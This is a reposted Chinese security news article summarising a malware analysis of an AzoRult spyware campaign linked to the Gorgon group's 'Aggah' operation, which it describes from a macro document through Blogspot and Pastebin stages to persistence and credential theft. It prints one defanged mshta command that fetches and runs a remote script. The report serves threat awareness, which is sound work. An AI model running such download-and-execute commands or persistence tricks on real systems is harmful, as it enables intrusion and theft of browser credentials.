安基网 欢乐生肖 资讯 安全报 查看内容

间谍软件AzoRult卷土重来,幕后操纵者疑似黑客组织“蛇发女妖”

2019-10-9 21:13| 投稿: |来自:


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 在今年3月份,网络安全公司Palo Alto Networks旗下情报威胁分析研究小组Unit 42公开披露了一起针对中东国家的网络攻击行动,并认为它与巴基斯坦黑客组织“蛇发女妖(Gorgon)”有关。这起行动被命名为“Aggah”,源 ...

在今年3月份,网络安全公司Palo Alto Networks旗下情报威胁分析研究小组Unit 42公开披露了一起针对中东国家的网络攻击行动,并认为它与巴基斯坦黑客组织“蛇发女妖(Gorgon)”有关。

这起行动被命名为“Aggah”,源于攻击者用来托管Revenge远控木马的Pastebin网站账户名(“HAGGA”)以及攻击者用来分割发送到Revenge C2服务器的数据的字符串(“aggah”)。

图1. HAGGA的Pastebin页面

图2.字符串“hagga”被用于分割发送到C2服务器的数据

近日,另一家网络安全公司Yoroi声称发现了一起与“Aggah”行动似乎存在关联的网络攻击行动,它们有着非常相似的感染链。

最大的区别在于,“Aggah”行动传播的恶意软件是Revenge远控木马,而新发现的行动传播的是AzoRult间谍软件。

恶意文档分析

图3.恶意文档样本信息

与“Aggah”行动一样,新行动的感染链也从一份包含VBA宏代码的恶意Office文档开始。

在去混淆后,你会发现它调用了如下系统命令:

mshta.exe http://bit[.ly/8hsshjahassahsh

短连接“bit.ly”会将受害者重定向到“hxxps://myownteammana.blogspot[.com/p/otuego4thday.html”,一个Blogspot博客页面,这同样与“Aggah”行动一样。

在该页面的源代码中,包含有一段将由MSHTA引擎执行JavaScript代码。

图4。隐藏在Blogspot页面中的HTA脚本

图5.经过混淆处理的HTA脚本

分析表明,该脚本是一个下载程序,用于下载托管在PasteBin上的第二阶段有效载荷。与“Aggah”行动一样,PasteBin账户名同样是“hagga”。

下载的第二阶段有效载荷将会终止Office套件进程,并创建一个新的注册表项,以实现在目标系统上的持久性。

图6.另一段经过混淆的JavaScript代码

具体来说,第二阶段有效载荷使用了三种机制来实现在目标系统上的持久性:

  • 创建一个名为“Windows Update”的新任务,每60分钟触发一次;
  • 创建另一个名为“Update”的任务每300分钟触发一次;
  • 设置注册表项“HKCUSoftwareMicrosoftWindowsCurrentVersionRunAvastUpdate”。

图7.用于实现持久性的代码

代码中的三个链接都指向同一个脚本,而该脚本将从Pastebin下载另外两段用于组成一个Powershell脚本的代码。

图8.去混淆后的脚本

图9.用于在合法进程中注入最终有效载荷的Powershell脚本

AzoRult有效载荷

图10. AzoRult样本信息

如上所述,新行动的最终有效载荷是在暗网交易市场上非常畅销的AzoRult间谍软件,它能够窃取大多数主流浏览器(如Chromium、Firefox、Opera、Vivaldi等)保存的凭证、cookie,以及其他敏感数据。

图11。 AzoRult尝试从浏览器文件中提取信息

分析表明,在这起新行动中传播的AzoRult是一个定制版本(3.2版本),被命名为“Mana Tools”,与攻击者使用的Blogspot博客页面相对应。

图12. Blogspot页面(左);AzoRult图标(右)

结论

在这个月的前几天,Yoroi发现攻击者在这起新行动中传播的有效载荷都是AzoRult间谍软件,但之后却切换为了Revenge远控木马。

如此看来,Gorgon黑客组织的确极有可能就是这起新行动的幕后操纵者。之所以使用AzoRult,有可能是该组织准备丰富他们的“军火库”。

不过,这里也存在另一种可能,即一个新的黑客组织模仿了“Aggah”行动的感染链,试图让Gorgon黑客组织来背这口黑锅。



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/i6740519293055664644/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

相关阅读

最新评论

 最新
返回顶部
韩国1.5分彩 快乐赛车 幸运飞艇官网 PC蛋蛋机器人 福建快3走势 山东11选5走势 欢乐生肖 澳洲幸运8 福建快3开奖 江苏快三质合走势图